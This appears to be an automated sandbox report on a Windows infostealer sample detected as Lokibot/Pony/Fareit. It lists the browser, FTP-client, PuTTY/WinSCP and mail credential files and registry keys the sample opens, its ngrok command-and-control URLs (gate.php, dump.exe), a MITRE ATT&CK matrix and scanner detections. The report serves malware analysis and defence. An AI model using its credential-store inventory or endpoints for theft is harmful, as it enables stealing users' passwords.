Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: 0_2_0041051E OleInitialize,GetUserNameA,0_2_0041051E
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: 0_2_004045FD GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,0_2_004045FD

              Stealing of Sensitive Information:

              barindex
              Detected Lokibot Info StealerShow sources
              Source: C:\Users\user\Desktop\eQDy6dGVwQ.exeCode function: 0_2_00409832 FindFirstFileA,lstrcmpi,lstrcmpi,StrStrIA,StrStrIA,lstrlen,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,0_2_00409832
              Yara detected PonyShow sources
              Source: Yara matchFile source: Process Memory Space: eQDy6dGVwQ.exe PID: 1316, type: MEMORY
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
              Source: C:\Users\user\Desktop\eQDy6dGVwQ.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
              Tries to harvest and steal browser information (history, passwords, etc)Show sources
              Source: C:\Users\user\Desktop\eQDy6dGVwQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
              Source: C:\Users\user\Desktop\eQDy6dGVwQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\eQDy6dGVwQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
              Source: C:\Users\user\Desktop\eQDy6dGVwQ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\wcx_ftp.ini
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\History.dat
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\History.dat
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\SharedSettings.ccs
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Roaming\Frigate3\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Roaming\FTP Explorer\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.ccs
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.sqlite
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\ProgramData\SharedSettings_1_0_5.ccs
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.sqlite
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Roaming\TurboFTP\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\sm.dat
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\CuteFTP\sm.dat
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.ccs
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\ProgramData\RhinoSoft.com\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Roaming\SharedSettings.ccs
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\Estsoft\ALFTP\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: HKEY_CURRENT_USER\Software\TurboFTP
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\CuteFTP\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\AceBIT
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Roaming\ExpanDrive\drives.js
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Roaming\BitKinex\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\FileZilla\filezilla.xml
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\ProgramData\LeapWare\LeapFTP\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\ProgramData\GPSoftware\Directory Opus\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\BitKinex\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.ccs
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\filezilla.xml
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: HKEY_CURRENT_USER\Software\AceBIT
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Roaming\Estsoft\ALFTP\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\FlashFXP\3\History.dat
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\ProgramData\FileZilla\filezilla.xml
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\ProgramData\CoffeeCup Software\SharedSettings.ccs
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\ProgramData\BitKinex\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Sites.dat
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\ProgramData\SharedSettings_1_0_5.sqlite
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Program Files (x86)\CuteFTP\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\ProgramData\SharedSettings.ccs
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\FlashFXP\4\History.dat
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.ccs
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\SmartFTP\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\ProgramData\GHISLER\wcx_ftp.ini
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Quick.dat
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\ProgramData\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\ExpanDrive\drives.js
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\ProgramData\FlashFXP\4\Sites.dat
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\ProgramData\FTP Explorer\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\ProgramData\FTPGetter\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.sqlite
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Roaming\SharedSettings.sqlite
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Program Files (x86)\CuteFTP\sm.dat
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\FlashFXP\3\Quick.dat
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\FlashFXP\4\Sites.dat
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\sm.dat
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Roaming\LeapWare\LeapFTP\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\ProgramData\CuteFTP\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\TurboFTP
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Roaming\CuteFTP\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\ProgramData\SmartFTP\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: HKEY_CURRENT_USER\Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\TurboFTP\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.ccs
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: HKEY_CURRENT_USER\Software\FTP Explorer\Profiles
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\ProgramData\Frigate3\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Roaming\GHISLER\wcx_ftp.ini
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.ccs
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\sm.dat
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Roaming\AceBIT\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\ProgramData\FileZilla\sitemanager.xml
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\ProgramData\CoffeeCup Software\SharedSettings.sqlite
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\ProgramData\TurboFTP\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\FlashFXP\3\Sites.dat
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\sm.dat
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\RhinoSoft.com\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\FTP Explorer\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\AceBIT\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\ProgramData\GlobalSCAPE\CuteFTP\sm.dat
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\ProgramData\FlashFXP\3\Quick.dat
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\FTPRush\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\ProgramData\Estsoft\ALFTP\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\sm.dat
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\ProgramData\ExpanDrive\drives.js
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\ProgramData\CuteFTP\sm.dat
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\sm.dat
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.sqlite
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\FlashFXP\4\Quick.dat
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\sm.dat
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\GPSoftware\Directory Opus\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\ProgramData\FlashFXP\3\Sites.dat
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.sqlite
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\FileZilla\sitemanager.xml
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\sm.dat
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\FTPGetter\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\ProgramData\SharedSettings.sqlite
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\ProgramData\AceBIT\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\ProgramData\GlobalSCAPE\CuteFTP\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.sqlite
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\GHISLER\wcx_ftp.ini
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Windows\32BitFtp.ini
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\sm.dat
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\LeapWare\LeapFTP\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\ProgramData\FlashFXP\4\Quick.dat
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\Frigate3\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Roaming\GPSoftware\Directory Opus\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\ProgramData\FTPRush\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\sm.dat
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Local\SharedSettings.sqlite
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\ProgramData\FlashFXP\3\History.dat
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Sites.dat
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: HKEY_LOCAL_MACHINE\Software\TurboFTP
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Quick.dat
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\ProgramData\FlashFXP\4\History.dat
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.ccs
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Windows\wcx_ftp.ini
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\sm.dat
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.sqlite
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Roaming\RhinoSoft.com\
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | File opened: C:\Users\user\AppData\Roaming\CuteFTP\sm.dat
Tries to steal Mail credentials (via file registry)
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, PopPassword | 0_2_0040EBA3
Source: C:\Users\user\Desktop\eQDy6dGVwQ.exe | Code function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, SmtpPassword | 0_2_0040EBA3

Remote Access Functionality:

Yara detected Pony
Source: Yara match | File source: Process Memory Space: eQDy6dGVwQ.exe PID: 1316, type: MEMORY

              Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts1 | Scripting1 | Valid Accounts1 | Valid Accounts1 | Deobfuscate/Decode Files or Information1 | OS Credential Dumping2 | Account Discovery1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Native API1 | Boot or Logon Initialization Scripts | Access Token Manipulation11 | Scripting1 | Credentials in Registry2 | File and Directory Discovery3 | Remote Desktop Protocol | Data from Local System3 | Exfiltration Over Bluetooth | Encrypted Channel2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Process Injection11 | Obfuscated Files or Information1 | Security Account Manager | System Information Discovery23 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Install Root Certificate1 | NTDS | Query Registry1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol12 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing1 | LSA Secrets | Security Software Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Valid Accounts1 | Cached Domain Credentials | Virtualization/Sandbox Evasion1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion1 | DCSync | Process Discovery11 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Access Token Manipulation11 | Proc Filesystem | System Owner/User Discovery1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection11 | /etc/passwd and /etc/shadow | Remote System Discovery1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

Behavior Graph

Legend: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language, Is malicious, Internet


              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

Source | Detection | Scanner | Label
eQDy6dGVwQ.exe | 84% | Virustotal |
eQDy6dGVwQ.exe | 89% | Metadefender |
eQDy6dGVwQ.exe | 96% | ReversingLabs | Win32.Infostealer.Fareit
eQDy6dGVwQ.exe | 100% | Avira | TR/PSW.Fareit.iloen
eQDy6dGVwQ.exe | 100% | Joe Sandbox ML |

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

Source | Detection | Scanner | Label
0.1.eQDy6dGVwQ.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
0.0.eQDy6dGVwQ.exe.400000.0.unpack | 100% | Avira | TR/PSW.Fareit.iloen
0.2.eQDy6dGVwQ.exe.400000.0.unpack | 100% | Avira | TR/PSW.Fareit.iloen

              Domains

              No Antivirus matches

              URLs

Source | Detection | Scanner | Label
http://https://ftp://operawand.dat_Software | 0% | Avira URL Cloud | safe
ftp://http://https://ftp.fireFTPsites.datSeaMonkey | 0% | Avira URL Cloud | safe
http://63e2e5290bcf.ngrok.io/gate.php | 0% | Avira URL Cloud | safe
http://www.ibsensoftware.com/ | 0% | URL Reputation | safe
http://63e2e5290bcf.ngrok.io/dump.exe | 0% | Avira URL Cloud | safe
http://63e2e5290bcf.ngrok.io/gate.phphttp://63e2e5290bcf.ngrok.io/dump.exeYUIPWDFILE0YUIPKDFILE0YUIC | 0% | Avira URL Cloud | safe

              Domains and IPs

              Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
63e2e5290bcf.ngrok.io | 3.13.191.225 | true | true | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://63e2e5290bcf.ngrok.io/dump.exe | true | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://https://ftp://operawand.dat_Software | eQDy6dGVwQ.exe | false | Avira URL Cloud: safe | low
https://ac.ecosia.org/autocomplete?q= | eQDy6dGVwQ.exe, 00000000.00000003.651830190.000000000066C000.00000004.00000001.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | eQDy6dGVwQ.exe, 00000000.00000003.651830190.000000000066C000.00000004.00000001.sdmp | false | | high
https://duckduckgo.com/ac/?q= | eQDy6dGVwQ.exe, 00000000.00000003.651830190.000000000066C000.00000004.00000001.sdmp | false | | high
ftp://http://https://ftp.fireFTPsites.datSeaMonkey | eQDy6dGVwQ.exe | false | Avira URL Cloud: safe | low
http://63e2e5290bcf.ngrok.io/gate.php | eQDy6dGVwQ.exe | false | Avira URL Cloud: safe | unknown
http://www.ibsensoftware.com/ | eQDy6dGVwQ.exe | false | URL Reputation: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | eQDy6dGVwQ.exe, 00000000.00000003.651830190.000000000066C000.00000004.00000001.sdmp | false | | high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search | eQDy6dGVwQ.exe, 00000000.00000003.651830190.000000000066C000.00000004.00000001.sdmp | false | | high
http://63e2e5290bcf.ngrok.io/gate.phphttp://63e2e5290bcf.ngrok.io/dump.exeYUIPWDFILE0YUIPKDFILE0YUIC | eQDy6dGVwQ.exe | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | eQDy6dGVwQ.exe, 00000000.00000003.651830190.000000000066C000.00000004.00000001.sdmp | false | | high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | eQDy6dGVwQ.exe, 00000000.00000003.651830190.000000000066C000.00000004.00000001.sdmp | false | | high

                              Contacted IPs


                              Public

IP | Domain | Country | ASN | ASN Name | Malicious
3.13.191.225 | 63e2e5290bcf.ngrok.io | United States | 16509 | AMAZON-02US | true

                              General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 376014
Start date: 25.03.2021
Start time: 16:33:08
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 3m 11s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: eQDy6dGVwQ.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@5/1@1/1
EGA Information: Failed
HDC Information:
• Successful, ratio: 100% (good quality ratio 97.8%)
• Quality average: 84.6%
• Quality standard deviation: 23.3%
HCA Information: Failed
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
Warnings:
• Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 40.88.32.150, 13.64.90.137, 168.61.161.212, 23.54.113.53, 13.88.21.125
• Excluded domains from analysis (whitelisted): skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, skypedataprdcolwus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, store-images.s-microsoft.com-c.edgekey.net, watson.telemetry.microsoft.com, skypedataprdcolwus15.cloudapp.net
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              No simulations

                              Joe Sandbox View / Context

                              IPs

Match | Associated Sample Name / URL | Detection
3.13.191.225 | zNx73OMw1y.exe | malicious
